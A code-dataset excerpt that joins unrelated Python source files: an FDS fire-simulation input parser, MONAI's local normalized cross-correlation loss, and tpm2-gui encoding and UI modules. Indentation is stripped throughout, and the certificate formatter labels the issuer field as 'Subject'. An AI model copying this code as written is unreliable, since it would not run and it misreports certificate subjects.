lines = self.makeFDSLines(textFDS)
self.parseFDSLines(lines)
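# Usage sketch (hypothetical path; the class name fdsFileOperations is
# assumed): round-trip an existing input file.
#     fds = fdsFileOperations()
#     fds.importFile(file='existing_case.fds')
#     fds.saveModel(4, 'existing_case_out.fds')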
def interpretKey(self, key, lineType, types):
"""Processes a key from a namelist key pair
This function processes a key from a namelist key pair to
return the keyID, keyType, and keyValue.
Parameters
----------
key : str
String containing namelist key pair
lineType : str
String containing namelist type
types : defaultdict
Dictionary containing types for each key in a namelist type
Returns
-------
str
raw keyID containing all text left of = sign
str
keyID with any array/matrix index text stripped
str
keyType string for this key from the namelist type definitions
str
raw keyValue containing all text right of = sign
"""
keyID = key.split('=')[0].upper()
keyValue = '='.join(key.split('=')[1:])
regex1 = r"\(\s*.*\)"
regex2 = r""
try:
keyID2 = re.sub(regex1, regex2, keyID)
except:
keyID2 = keyID
#keyID = keyID.strip()
#keyID2 = keyID.strip()
keyID2 = keyID2.replace("\t","")
while keyID2[-1] == ' ':
keyID2 = keyID2[:-1]
while keyID2[0] == ' ':
keyID2 = keyID2[1:]
keyType = getattr(types, lineType.lower())[keyID2]
return keyID, keyID2, keyType, keyValue
def keyAssist(self, text, types, dic,
internalKeys=['counter'], newline=False):
"""Returns a namelist text line from dictionary inputs.
This function returns a namelist text line based on an input
dictionary and type dictionary.
Parameters
----------
text : str
String to which to append namelist fields
types : dict
Dictionary containing types for namelist fields
dic : dict
Dictionary containing namelist keys and values
internalKeys : list, optional
List containing internal software fields not to be exported
to the text line
newline : bool, optional
Flag specifying whether each key in the namelist is to be
entered on the same line or on different lines
Returns
-------
str
Updated text string
"""
keys = list(dic.keys())
keys.sort()
if 'ID' in keys:
keys.insert(0, keys.pop(keys.index('ID')))
if dic['ID'] is False: dic['ID'] = 'UNKNOWN'
for key in internalKeys:
if key in keys:
keys.remove(key)
for key2 in keys:
#print(key2)
if 'THICKNESS' in key2:
decimals = 8
else:
decimals = 4
if (types[key2] == 'ignore'):
pass
elif (types[key2] == 'string'):
if dic[key2] is not False:
text = "%s%s='%s', "%(text, key2, dic[key2])
elif (types[key2] == 'float'):
#print(key2, dic[key2])
if dic[key2] is not False:
text = "%s%s=%s, "%(text, key2, '{:.{prec}f}'.format(dic[key2], prec=decimals))
elif (types[key2] == 'int'):
if dic[key2] is not False:
text = "%s%s=%0.0f, "%(text, key2, dic[key2])
elif (types[key2] == 'bool'):
boolCheck = False
if (dic[key2] is True): boolCheck = True
if (dic[key2] == 'TRUE'): boolCheck = True
if (dic[key2] == '.TRUE.'): boolCheck = True
if boolCheck:
text = "%s%s=.TRUE., "%(text, key2)
else:
text = "%s%s=.FALSE., "%(text, key2)
elif ('listind' in types[key2]):
temp = np.array(dic[key2])
tempTxt = "%s(%0.0f:%0.0f)="%(
key2, 1, temp.shape[0])
if type(temp[0]) == np.float64: temp = [temp]
for t in temp:
for tt in t:
if ('string' in types[key2]):
tempTxt = "%s '%s',"%(tempTxt, tt)
if ('float' in types[key2]):
tempTxt = "%s %s,"%(tempTxt, '{:.{prec}f}'.format(tt, prec=decimals))
if ('int' in types[key2]):
tempTxt = "%s %0.0f,"%(tempTxt, tt)
text = "%s%s "%(text, tempTxt)
elif ('list' in types[key2]):
temp = dic[key2]
tempTxt = "%s="%(key2)
if temp is not False:
for t in temp:
if ('string' in types[key2]):
tempTxt = "%s '%s',"%(tempTxt, t)
if ('float' in types[key2]):
tempTxt = "%s %s,"%(tempTxt, '{:.{prec}f}'.format(t, prec=decimals))
if ('int' in types[key2]):
tempTxt = "%s %0.0f,"%(tempTxt, t)
text = "%s%s "%(text, tempTxt)
elif ('matrix' in types[key2]):
temp = np.array(dic[key2])
sz = temp.shape
if len(sz) == 1:
temp = np.reshape(temp, (temp.shape[0], 1))
sz = temp.shape
ar1 = "(%0.0f:%0.0f,%0.0f:%0.0f)"%(
1, sz[1], 1, sz[0])
tempTxt = "%s%s="%(key2, ar1)
for t in temp.flatten():
if ('string' in types[key2]):
tempTxt = "%s '%s',"%(tempTxt, t)
if ('float' in types[key2]):
tempTxt = "%s %s,"%(tempTxt, '{:.{prec}f}'.format(t, prec=decimals))
if ('int' in types[key2]):
tempTxt = "%s %0.0f,"%(tempTxt, float(t))
text = "%s%s "%(text, tempTxt)
else:
print(keys)
print(dic)
print(key2)
print(types[key2])
assert False, "Stopped"
if newline and (types[key2] != 'ignore'):
text = "%s\n "%(text)
#except:
# print(keys)
# print(dic)
# print(types[key2])
return text
def keyFromLineType(self, lineType):
"""Returns internal attribute name from namelist type
Parameters
----------
lineType : str
String containing namelist type
Returns
-------
str
String containing internal attribute name
"""
if lineType == 'HEAD': key = 'head'
if lineType == 'DEVC': key = 'devcs'
if lineType == 'INIT': key = 'inits'
if lineType == 'OBST': key = 'obsts'
if lineType == 'VENT': key = 'vents'
if lineType == 'SURF': key = 'surfs'
if lineType == 'RAMP': key = 'ramps'
if lineType == 'CTRL': key = 'ctrls'
if lineType == 'MESH': key = 'meshes'
if lineType == 'SLCF': key = 'slcfs'
if lineType == 'BNDF': key = 'bndfs'
if lineType == 'TIME': key = 'time'
if lineType == 'DUMP': key = 'dump'
if lineType == 'MISC': key = 'misc'
if lineType == 'ZONE': key = 'zones'
if lineType == 'REAC': key = 'reacs'
if lineType == 'MATL': key = 'matls'
if lineType == 'RADI': key = 'radis'
if lineType == 'PRES': key = 'pres'
if lineType == 'HOLE': key = 'holes'
if lineType == 'PART': key = 'parts'
if lineType == 'PROP': key = 'props'
if lineType == 'SPEC': key = 'specs'
if lineType == 'PROF': key = 'profs'
if lineType == 'WIND': key = 'winds'
return key
def makeFDSLines(self, textFDS):
"""Returns a list of namelist lines
This function cleans the input file, removing line breaks, and
splitting the text into lines based on namelist grouping.
Parameters
----------
textFDS : str
String containing text from an fds input file
Returns
-------
list
List of strings containing namelist lines
"""
linesFDS = [x for x in textFDS.split("&")[1:]]
for i in range(0, len(linesFDS)):
line2 = linesFDS[i]
line2 = '/'.join(line2.split('/')[:-1])
line2 = line2.replace('\r', ',')
line2 = line2.replace('\n', ',')
line2 = "%s,"%(line2) if line2[-1] != ',' else line2
line2 = '%s /'%(line2)
while ',,' in line2: line2 = line2.replace(',,',',')
while ' ,' in line2: line2 = line2.replace(' ,',',')
while ' ' in line2: line2 = line2.replace(" ", " ")
while ',,' in line2: line2 = line2.replace(',,',',')
line_tmp = list(line2)
if line_tmp[4] == ',':
line_tmp[4] = ' '
line2 = "".join(line_tmp)
while ' ' in line2: line2 = line2.replace(" ", " ")
linesFDS[i] = line2
lineTypes = [x[:4] for x in linesFDS]
if 'TAIL' in lineTypes:
ind = np.argwhere([True if x == 'TAIL' else False for x in lineTypes])[0][0]
linesFDS = linesFDS[:ind]
return linesFDS
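# Behaviour sketch (derived from the code above): namelists are split on '&'
# and re-joined into single comma-separated lines terminated with ' /'.
#     self.makeFDSLines("&HEAD CHID='demo' /\n&TIME T_END=60.0 /\n")
#     # -> ["HEAD CHID='demo', /", "TIME T_END=60.0, /"]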
def makeLinesFromDict(self, items, types, prefix, newline=False):
"""Returns a str generated from a namelist dictionary
This function generates a text string from a namelist
dictionary.
Parameters
----------
items : dict
Dictionary containing key pairs from a namelist group
types : dict
Dictionary containing types from a namelist group
prefix : str
String containing the namelist type
newline : bool, optional
Flag specifying whether each key in the namelist is to be
entered on the same line or on different lines
Returns
-------
str
Text containing the generated namelist lines
"""
text = ''
keys = list(items.keys())
keys.sort()
if 'unknownCounter' in keys: keys.remove('unknownCounter')
if 'newline' in keys: keys.remove('newline')
for key in keys:
text = "%s%s "%(text, prefix)
text = self.keyAssist(text, types, items[key], newline=newline)
text = "%s /\n"%(text)
return text
def makeMESH(self, meshes, meshTypes, order=False):
"""Returns a str generated from a meshes namelist dictionary.
Parameters
----------
meshes : dict
Dictionary containing mesh definitions
meshTypes : dict
Dictionary containing types from mesh namelists
order : list, optional
Order to output meshes. If False, meshes are not output in
any particular order. (default False)
Returns
-------
str
Text line generated from dictionary
"""
text = ''
meshList = list(meshes.keys())
if 'unknownCounter' in meshList:
meshList.remove('unknownCounter')
if (order is not False): meshList = [meshList[x] for x in order]
for key in meshList:
text = "%s&MESH "%(text)
text = self.keyAssist(text, meshTypes, meshes[key])
text = "%s /\n"%(text)
return text
def makeRAMP(self, ramps):
"""Returns a str generated from a ramps namelist dictionary.
Parameters
----------
ramps : dict
Dictionary containing ramp definitions
Returns
-------
str
Text line generated from dictionary
"""
text = ''
for key in list(ramps.keys()):
ID = ramps[key]['ID']
makeControl = True
for F, T in zip(ramps[key]['F'], ramps[key]['T']):
if makeControl and ramps[key]['CTRL_ID']:
text = "%s&RAMP ID='%s', T = %0.4f, F = %0.4f, CTRL_ID='%s'/\n"%(text, ID, T, F, ramps[key]['CTRL_ID'])
makeControl = False
else:
text = "%s&RAMP ID='%s', T = %0.4f, F = %0.4f, /\n"%(text, ID, T, F)
return text
def mergeTypeFromLineType(self, lineType):
"""Returns internal merge type based on namelist type.
Parameters
----------
lineType : str
String containing namelist type
Returns
-------
str
String containing merge type for namelist type
"""
key = 'unknown'
if lineType == 'HEAD': key = 'merge'
if lineType == 'DEVC': key = 'enumerate'
if lineType == 'INIT': key = 'enumerate'
if lineType == 'OBST': key = 'enumerate'
if lineType == 'VENT': key = 'enumerate'
if lineType == 'SURF': key = 'enumerate'
if lineType == 'RAMP': key = 'append'
if lineType == 'CTRL': key = 'enumerate'
if lineType == 'MESH': key = 'enumerate'
if lineType == 'SLCF': key = 'enumerate'
if lineType == 'BNDF': key = 'enumerate'
if lineType == 'TIME': key = 'merge'
if lineType == 'DUMP': key = 'merge'
if lineType == 'MISC': key = 'merge'
if lineType == 'ZONE': key = 'enumerate'
if lineType == 'REAC': key = 'enumerate'
if lineType == 'MATL': key = 'enumerate'
if lineType == 'RADI': key = 'merge'
if lineType == 'PRES': key = 'merge'
if lineType == 'HOLE': key = 'enumerate'
if lineType == 'PART': key = 'enumerate'
if lineType == 'PROP': key = 'enumerate'
if lineType == 'SPEC': key = 'enumerate'
if lineType == 'PROF': key = 'enumerate'
if lineType == 'WIND': key = 'merge'
return key
def parseFDSLines(self, lines):
"""Adds each line to internal attribute namelist dictionaries.
Parameters
----------
lines : list
List containing strings of namelist lines
"""
for line in lines:
lineType = self.getLineType(line)
key = self.keyFromLineType(lineType)
types = fdsLineTypes(version=self.version)
self.parseLine(line, lineType, types, key)
devcKeys = list(self.devcs.keys())
devcKeys.remove('unknownCounter')
for key in devcKeys:
if self.devcs[key]['INIT_ID']:
initXYZ = self.inits[self.devcs[key]['INIT_ID']]['XYZ']
self.devcs[key]['XYZ'] = initXYZ
else:
self.devcs[key].pop('INIT_ID')
def parseLine(self, line, lineType, types, key):
"""Adds one line to the internal attribute namelist dictionary.
Parameters
----------
line : str
String containing namelist line
lineType : str
String containing namelist line type
types : dict
Dictionary containing key types for namelist pair
key : str
String containing internal attribute key for namelist line
type
"""
#print(line)
check = True
try:
lineDict = self.dictFromLine(line, lineType, types)
except:
print("WARNING: Unknown line in input file.\n")
print("%s\n"%(line))
check = False
if check:
tmp = getattr(self, key)
mergeType = self.mergeTypeFromLineType(lineType)
if mergeType == 'merge':
if not tmp['ID']: tmp['ID'] = defaultdict(bool)
tmp['ID'] = self.dictMerge(tmp['ID'], lineDict)
setattr(self, key, tmp)
elif mergeType == 'append':
ID = lineDict['ID']
if tmp[ID]:
for keyID2 in list(lineDict.keys()):
keyType = getattr(types, lineType.lower())[keyID2]
keyValue = lineDict[keyID2]
if (keyType == 'listrowfloat'):
for v in keyValue:
tmp[ID][keyID2].append(v)
else:
tmp[ID] = lineDict
elif mergeType == 'enumerate':
ID = lineDict['ID']
if ID is False:
ID = "ID"
lineDict["ID"] = ID
if tmp[ID]:
counter = tmp[ID]['counter']
if lineDict['ID'] == False: lineDict["ID"] = "%s-%04.0f"%(ID, counter)
tmp["%s-%04.0f"%(ID, counter)] = lineDict
tmp[ID]['counter'] += 1
pass
else:
tmp[ID] = lineDict
tmp[ID]['counter'] = 0
else:
assert False, "Stopped"
def saveModel(self, mpiProcesses, location,
allowMeshSplitting=True, splitMultiplier=1.2,
meshSplitAxes=[True, True, False]):
"""Saves an fds input file
Input file is generated based on internal attribute namelist
dictionaries. This function also allows splitting of meshes to
optimize the balance across mpi processes.
Parameters
----------
mpiProcesses : int
The number of mpi processes to define in the input file
location : str
The path location to save the input file
allowMeshSplitting : bool, optional
Flag to enable mesh splitting for balancing mpi processes
(default is True)
splitMultiplier : float, optional
Tolerance used in mesh splitting (default is 1.2)
meshSplitAxes : list of booleans, optional
Specifies along which axes the software is allowed to split
meshes
"""
self.addMPIprocesses(
mpiProcesses, allowMeshSplitting=allowMeshSplitting,
splitMultiplier=splitMultiplier,
meshSplitAxes=meshSplitAxes)
text = self.generateFDStext()
with open(location, 'w') as f:
f.write(text)
print("Input file written to: %s"%(location))
def splitLineIntoKeys(self, line2):
"""Returns namelist key pairs from a line.
Parameters
----------
line2 : str
String containing namelist line
Returns
-------
list
List containing namelist keys
"""
line = line2.replace('\n', ',').replace('\r', ',')
while (',,' in line) or (' ' in line):
line = line.replace(',,', ',').replace(' ', ' ')
regex1 = r"(\(.{0,3}),(.{0,3}\))"
regex2 = r"\1;\2"
try:
line = re.sub(regex1, regex2, line)
except:
pass
keys = line.split(',')
keys[0] = keys[0][4:]
updatedKeys = []
txt = ''
for i in range(0,len(keys)):
if '=' in keys[i]:
updatedKeys.append(txt)
txt = keys[i]
else:
txt = ','.join([txt,keys[i]])
updatedKeys.append(txt)
while '' in updatedKeys:
updatedKeys.remove('')
for i, txt in enumerate(updatedKeys):
while txt[0] == ' ':
txt = txt[1:]
updatedKeys[i] = txt
for i, txt in enumerate(updatedKeys):
while txt[-1] == ' ' or txt[-1] == ',' or txt[-1] == '/':
txt = txt[:-1]
updatedKeys[i] = txt
return updatedKeys
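# Behaviour sketch (derived from the code above):
#     self.splitLineIntoKeys("OBST ID='WALL', XB=0.0,1.0,0.0,0.1,0.0,2.4 /")
#     # -> ["ID='WALL'", "XB=0.0,1.0,0.0,0.1,0.0,2.4"]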
def splitMESHonce(self, mesh, meshSplitAxes):
"""Splits a mesh along its largest axis.
Parameters
----------
mesh : dict
Dictionary containing information for a single mesh
meshSplitAxes : list of booleans
Specifies along which axes the software is allowed to split
the mesh.
"""
IJK = np.round(mesh['IJK'])
XB = mesh['XB']
dxs = [(XB[1]-XB[0])/float(IJK[0]), (XB[3]-XB[2])/float(IJK[1]), (XB[5]-XB[4])/float(IJK[2])]
ind = np.argmax(IJK)
IJK_temp = list(IJK)
while meshSplitAxes[ind] is False:
IJK_temp = list(IJK_temp)
IJK_temp[ind] = 0
ind = np.argmax(IJK_temp)
if np.sum(IJK_temp) == 0:
print("Failed to split mesh.")
break
IJK2 = list(IJK)
XB2 = list(XB)
IJK2[ind] = int(IJK[ind]/2)
if IJK2[ind] % 2 > 0: IJK2[ind] = IJK2[ind]-1
XB2[int(2*ind+1)] = XB2[int(2*ind)] + dxs[ind]*float(IJK2[ind])
IJK3 = list(IJK)
XB3 = list(XB)
IJK3[ind] = IJK[ind] - IJK2[ind]
XB3[int(2*ind)] = XB2[int(2*ind+1)]
mesh2 = defaultdict(bool)
mesh2['ID'] = "%s-00"%(mesh["ID"])
mesh2['XB'] = XB2
mesh2['IJK'] = IJK2
mesh3 = defaultdict(bool)
mesh3['ID'] = "%s-01"%(mesh["ID"])
mesh3['XB'] = XB3
mesh3['IJK'] = IJK3
self.meshes.pop(mesh['ID'], False)
self.meshes[mesh2['ID']] = mesh2
self.meshes[mesh3['ID']] = mesh3
def zopen(self, file):
"""Opens a file or zip archive for reading.
Parameters
----------
file : str
String containing path to file or zip archive
Returns
-------
file
Open binary file for reading
"""
if '.zip' in file:
zname = '%s.zip'%(file.split('.zip')[0])
fname = file.split('.zip%s'%(os.sep))[1]
zip = zipfile.ZipFile(zname, 'r')
f = zip.open(fname)
else:
f = open(file, 'rb')
return f
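# Usage sketch (hypothetical paths): plain files and members of zip archives
# are both addressed by path; zip members use '<archive>.zip<os.sep><member>'.
#     f = self.zopen('case.fds')                        # regular file
#     f = self.zopen('archive.zip%scase.fds' % os.sep)  # member of archive.zip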
``` |
{
"source": "JoHof/MONAI",
"score": 2
} |
#### File: monai/losses/image_dissimilarity.py
```python
from typing import Union
import torch
from torch.nn import functional as F
from torch.nn.modules.loss import _Loss
from monai.networks.layers import gaussian_1d, separable_filtering
from monai.utils import LossReduction
def make_rectangular_kernel(kernel_size: int) -> torch.Tensor:
return torch.ones(kernel_size)
def make_triangular_kernel(kernel_size: int) -> torch.Tensor:
fsize = (kernel_size + 1) // 2
if fsize % 2 == 0:
fsize -= 1
f = torch.ones((1, 1, fsize), dtype=torch.float).div(fsize)
padding = (kernel_size - fsize) // 2 + fsize // 2
return F.conv1d(f, f, padding=padding).reshape(-1)
def make_gaussian_kernel(kernel_size: int) -> torch.Tensor:
sigma = torch.tensor(kernel_size / 3.0)
kernel = gaussian_1d(sigma=sigma, truncated=kernel_size // 2, approx="sampled", normalize=False) * (
2.5066282 * sigma
)
return kernel[:kernel_size]
kernel_dict = {
"rectangular": make_rectangular_kernel,
"triangular": make_triangular_kernel,
"gaussian": make_gaussian_kernel,
}
class LocalNormalizedCrossCorrelationLoss(_Loss):
"""
Local squared zero-normalized cross-correlation.
The loss is based on a moving kernel/window over the y_true/y_pred,
within the window the square of zncc is calculated.
The kernel can be a rectangular / triangular / gaussian window.
The final loss is the averaged loss over all windows.
Adapted from:
https://github.com/voxelmorph/voxelmorph/blob/legacy/src/losses.py
DeepReg (https://github.com/DeepRegNet/DeepReg)
"""
def __init__(
self,
in_channels: int,
ndim: int = 3,
kernel_size: int = 9,
kernel_type: str = "rectangular",
reduction: Union[LossReduction, str] = LossReduction.MEAN,
smooth_nr: float = 1e-7,
smooth_dr: float = 1e-7,
) -> None:
"""
Args:
in_channels: number of input channels
ndim: number of spatial dimensions, {``1``, ``2``, ``3``}. Defaults to 3.
kernel_size: kernel spatial size, must be odd.
kernel_type: {``"rectangular"``, ``"triangular"``, ``"gaussian"``}. Defaults to ``"rectangular"``.
reduction: {``"none"``, ``"mean"``, ``"sum"``}
Specifies the reduction to apply to the output. Defaults to ``"mean"``.
- ``"none"``: no reduction will be applied.
- ``"mean"``: the sum of the output will be divided by the number of elements in the output.
- ``"sum"``: the output will be summed.
smooth_nr: a small constant added to the numerator to avoid nan.
smooth_dr: a small constant added to the denominator to avoid nan.
"""
super(LocalNormalizedCrossCorrelationLoss, self).__init__(reduction=LossReduction(reduction).value)
self.in_channels = in_channels
self.ndim = ndim
if self.ndim not in [1, 2, 3]:
raise ValueError(f"Unsupported ndim: {self.ndim}-d, only 1-d, 2-d, and 3-d inputs are supported")
self.kernel_size = kernel_size
if self.kernel_size % 2 == 0:
raise ValueError(f"kernel_size must be odd, got {self.kernel_size}")
if kernel_type not in kernel_dict.keys():
raise ValueError(
f'Unsupported kernel_type: {kernel_type}, available options are ["rectangular", "triangular", "gaussian"].'
)
self.kernel = kernel_dict[kernel_type](self.kernel_size)
self.kernel_vol = torch.sum(self.kernel) ** self.ndim
self.smooth_nr = float(smooth_nr)
self.smooth_dr = float(smooth_dr)
def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""
Args:
input: the shape should be BNH[WD].
target: the shape should be BNH[WD].
Raises:
ValueError: When ``self.reduction`` is not one of ["mean", "sum", "none"].
"""
assert (
input.shape[1] == self.in_channels
), f"expecting input with {self.in_channels} channels, got input of shape {input.shape}"
assert (
input.ndim - 2 == self.ndim
), f"expecting input with {self.ndim} spatial dimensions, got input of shape {input.shape}"
assert (
target.shape == input.shape
), f"ground truth has differing shape ({target.shape}) from input ({input.shape})"
t2, p2, tp = target ** 2, input ** 2, target * input
# sum over kernel
t_sum = separable_filtering(target, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
p_sum = separable_filtering(input, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
t2_sum = separable_filtering(t2, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
p2_sum = separable_filtering(p2, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
tp_sum = separable_filtering(tp, kernels=[self.kernel] * self.ndim).sum(1, keepdim=True)
# average over kernel
t_avg = t_sum / self.kernel_vol
p_avg = p_sum / self.kernel_vol
# normalized cross correlation between t and p
# sum[(t - mean[t]) * (p - mean[p])] / std[t] / std[p]
# denoted by num / denom
# assume we sum over N values
# num = sum[t * p - mean[t] * p - t * mean[p] + mean[t] * mean[p]]
# = sum[t*p] - sum[t] * sum[p] / N * 2 + sum[t] * sum[p] / N
# = sum[t*p] - sum[t] * sum[p] / N
# = sum[t*p] - sum[t] * mean[p] = cross
# the following is actually squared ncc
cross = tp_sum - p_avg * t_sum
t_var = t2_sum - t_avg * t_sum # std[t] ** 2
p_var = p2_sum - p_avg * p_sum # std[p] ** 2
ncc: torch.Tensor = (cross * cross + self.smooth_nr) / (t_var * p_var + self.smooth_dr)
# shape = (batch, 1, D, H, W)
if self.reduction == LossReduction.SUM.value:
return torch.sum(ncc).neg() # sum over the batch and spatial ndims
if self.reduction == LossReduction.NONE.value:
return ncc.neg()
if self.reduction == LossReduction.MEAN.value:
return torch.mean(ncc).neg() # average over the batch and spatial ndims
raise ValueError(f'Unsupported reduction: {self.reduction}, available options are ["mean", "sum", "none"].')
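# Usage sketch (hypothetical shapes): 3-d, single-channel volumes.
#     loss = LocalNormalizedCrossCorrelationLoss(in_channels=1, ndim=3, kernel_size=9)
#     pred = torch.rand(2, 1, 32, 32, 32)
#     target = torch.rand(2, 1, 32, 32, 32)
#     value = loss(pred, target)  # scalar with reduction="mean"; more negative means more similar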
``` |
{
"source": "joholl/tpm2-gui",
"score": 2
} |
#### File: tpm2_gui/ui/encoding.py
```python
from enum import IntEnum, auto
from pathlib import Path
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey
from cryptography.x509 import Certificate
# +=========================================================+
# | Encoding: | String | Hex | Hexdump | PEM | DER | Info |
# +============+=========+=====+=========+=====+=====+======+
# | Bytearray | y | y | y | - | - | - |
# | Bytes | y | y | y | - | - | - |
# | String | y | y | y | - | - | - |
# | EC Pub Key | - | - | - | y | y | y |
# | Cert | - | - | - | y | y | y |
# +============+=========+=====+=========+=====+=====+======+
# TODO UInt64 and Bitfield (byte-like)
class Encoding(IntEnum):
"""Encoding Options."""
String = auto()
Hex = auto()
Hexdump = auto()
PEM = auto()
DER = auto()
Info = auto()
UInt64 = auto()
Bitfield = auto()
def __str__(self):
return {
Encoding.String: "String",
Encoding.Hex: "Hex",
Encoding.Hexdump: "Hexdump",
Encoding.PEM: "PEM",
Encoding.DER: "DER (Hex)",
Encoding.Info: "Info",
Encoding.UInt64: "Integer",
Encoding.Bitfield: "Bitfield",
}[self]
class ValueType(IntEnum):
"""Value Types which are to be encoded."""
Bytearray = auto()
Bytes = auto()
String = auto()
Path = auto()
ECPublicKey = auto()
RSAPublicKey = auto()
Cert = auto()
@staticmethod
def from_value(value):
"""Autodetect the ValueType."""
# cast value to bytes if it is not already
if isinstance(value, bytearray):
return ValueType.Bytearray
if isinstance(value, bytes):
return ValueType.Bytes
if isinstance(value, str):
return ValueType.String
if isinstance(value, Path):
return ValueType.Path
if isinstance(value, EllipticCurvePublicKey):
return ValueType.ECPublicKey
if isinstance(value, RSAPublicKey):
return ValueType.RSAPublicKey
if isinstance(value, Certificate):
return ValueType.Cert
raise ValueError(f"Could not find ValueType for value {value}")
class Encoder:
"""Utility class for encoding values."""
@staticmethod
def _bytes_to_string(value):
try:
return value.decode("utf-8")
except UnicodeDecodeError as error:
return (
f"Error: cannot decode byte {bytes([value[error.start]])} at index {error.start}. "
f"Hint: Use Encoding '{str(Encoding.Hex)}'"
)
@staticmethod
def _bytes_to_hex(value):
return " ".join("{:02x}".format(b) for b in value)
@staticmethod
def _bytes_to_hexdump(value, line_len=16):
"""Get hexdump from bytearray."""
char_map = "".join([(len(repr(chr(b))) == 3) and chr(b) or "." for b in range(256)])
lines = []
# for each line
for offset in range(0, len(value), line_len):
line_text = value[offset : offset + line_len]
line_hex = " ".join(["%02x" % b for b in line_text])
# replace non-printable chars with '.'
printable = "".join(["%s" % ((b <= 127 and char_map[b]) or ".") for b in line_text])
lines.append("%04x %-*s |%s|\n" % (offset, line_len * 3, line_hex, printable))
return "".join(lines)
@staticmethod
def _int_to_hex(value):
value_hex = f"{value:x}"
# pad to even number of digits
if len(value_hex) % 2 != 0:
value_hex = f"0{value_hex}"
# group two each
return " ".join(f"{a}{b}" for (a, b) in zip(value_hex[::2], value_hex[1::2]))
@staticmethod
def _bytes_like_to_bytes(value):
"""Cast bytes-like value (bytearray, bytes, string) to bytes."""
if isinstance(value, bytearray):
return bytes(value)
if isinstance(value, str):
return value.encode("utf-8")
if isinstance(value, Path):
return str(value).encode("utf-8")
if isinstance(value, bytes):
return value
raise ValueError(f"Could not convert byte-like value to bytes: {value}")
@staticmethod
def _encode_bytes_like(value, encoding):
"""Encode bytes-like value (bytearray, bytes, string)."""
value = Encoder._bytes_like_to_bytes(value)
# encode
return {
Encoding.String: Encoder._bytes_to_string,
Encoding.Hex: Encoder._bytes_to_hex,
Encoding.Hexdump: Encoder._bytes_to_hexdump,
}[encoding](value)
@staticmethod
def _encode_ec_public_key(value, encoding):
"""Encode an EllipticCurvePublicKey."""
return {
Encoding.PEM: Encoder._bytes_to_string(
value.public_bytes(
serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.DER: Encoder._bytes_to_hex(
value.public_bytes(
serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.Info: f"""
EC Public Key
Curve: {value.curve.name}
Key Size: {value.key_size}
X: {Encoder._int_to_hex(value.public_numbers().x)}
Y: {Encoder._int_to_hex(value.public_numbers().y)}
""".strip(),
}[encoding]
@staticmethod
def _encode_rsa_public_key(value, encoding):
"""Encode an RSAPublicKey."""
return {
Encoding.PEM: Encoder._bytes_to_string(
value.public_bytes(
serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.DER: Encoder._bytes_to_hex(
value.public_bytes(
serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo
)
),
Encoding.Info: f"""
RSA Public Key
Key Size: {value.key_size}
Modulus n: {Encoder._int_to_hex(value.public_numbers().n)}
Exponent e: {Encoder._int_to_hex(value.public_numbers().e)}
""".strip(),
}[encoding]
@staticmethod
def _encode_cert(value, encoding):
"""Encode a Certificate."""
oid_name = (
value.signature_algorithm_oid._name # [TODO refactor] pylint: disable=protected-access
)
return {
Encoding.PEM: Encoder._bytes_to_string(value.public_bytes(serialization.Encoding.PEM)),
Encoding.DER: Encoder._bytes_to_hex(value.public_bytes(serialization.Encoding.DER)),
Encoding.Info: f"""
X.509 Certificate
Issuer: {", ".join(e.rfc4514_string() for e in value.issuer.rdns)}
Subject: {", ".join(e.rfc4514_string() for e in value.issuer.rdns)}
Serial No.: {Encoder._int_to_hex(value.serial_number)}
Not valid before: {value.not_valid_before}
Not valid after: {value.not_valid_after}
Version: {value.version}
Signature Hash Alg: {value.signature_hash_algorithm.name}
Signature Alg OID: {value.signature_algorithm_oid.dotted_string} ({oid_name})
Public Key: {value.public_key}
Signature: {" ".join("{:02x}".format(b) for b in value.signature)}
Fingerprint: {" ".join("{:02x}".format(b) for b in value.fingerprint(hashes.SHA256()))}
Extensions: {value.extensions} # TODO
""".strip(),
}[encoding]
@staticmethod
def encode(value, encoding):
"""Encode a value according to the given encoding option."""
if not value:
return ""
value_type = ValueType.from_value(value)
return {
ValueType.Bytearray: Encoder._encode_bytes_like,
ValueType.Bytes: Encoder._encode_bytes_like,
ValueType.String: Encoder._encode_bytes_like,
ValueType.Path: Encoder._encode_bytes_like,
ValueType.ECPublicKey: Encoder._encode_ec_public_key,
ValueType.RSAPublicKey: Encoder._encode_rsa_public_key,
ValueType.Cert: Encoder._encode_cert,
}[value_type](value, encoding)
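# --- Hedged usage sketch (illustrative addition, not part of the original module) ---
# Demonstrates the dispatch implemented above for byte-like values; the inputs are
# made up for the example.
if __name__ == "__main__":
    print(Encoder.encode(bytearray(b"tpm2"), Encoding.Hex))   # "74 70 6d 32"
    print(Encoder.encode("secret data", Encoding.Hexdump))    # one hexdump-style line
    print(Encoder.encode(b"", Encoding.String))               # empty input -> ""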
```
#### File: tpm2_gui/ui/objects.py
```python
import gi # isort:skip
gi.require_version("Gtk", "3.0") # pylint: disable=wrong-import-position
# isort:imports-thirdparty
from gi.repository import Gtk
from .widgets import Encoding, ValueEditView, ValueView
class ObjectDetails(Gtk.Grid):
"""Make the details to a TPM object accessible, e.g. the associated app data and description."""
def __init__(self, tpm):
super().__init__(column_spacing=10, row_spacing=10)
self._tpm = tpm
self._path = None
self._tpm_object = None
self.get_style_context().add_class("object_details")
row = 0
self.heading_lbl = Gtk.Label(xalign=0)
self.heading_lbl.get_style_context().add_class("object_details_heading")
self.heading_lbl.set_use_markup(True)
self.attach(self.heading_lbl, 0, row, 3, 1)
row += 1
self._value_views = [
ValueView("Path", self._tpm_object, "path", multiline=False),
ValueView("Keystore File", self._tpm_object, "json_path", multiline=False),
ValueEditView(
"Description",
self._tpm_object,
"description",
encodings=[Encoding.String],
),
ValueEditView(
"Application Data",
self._tpm_object,
"appdata",
encodings=[Encoding.String, Encoding.Hex, Encoding.Hexdump],
),
ValueView(
"Public Key",
self._tpm_object,
"public",
encodings=[Encoding.Info, Encoding.PEM, Encoding.DER],
),
ValueView(
"Object Attributes",
self._tpm_object,
"attributes",
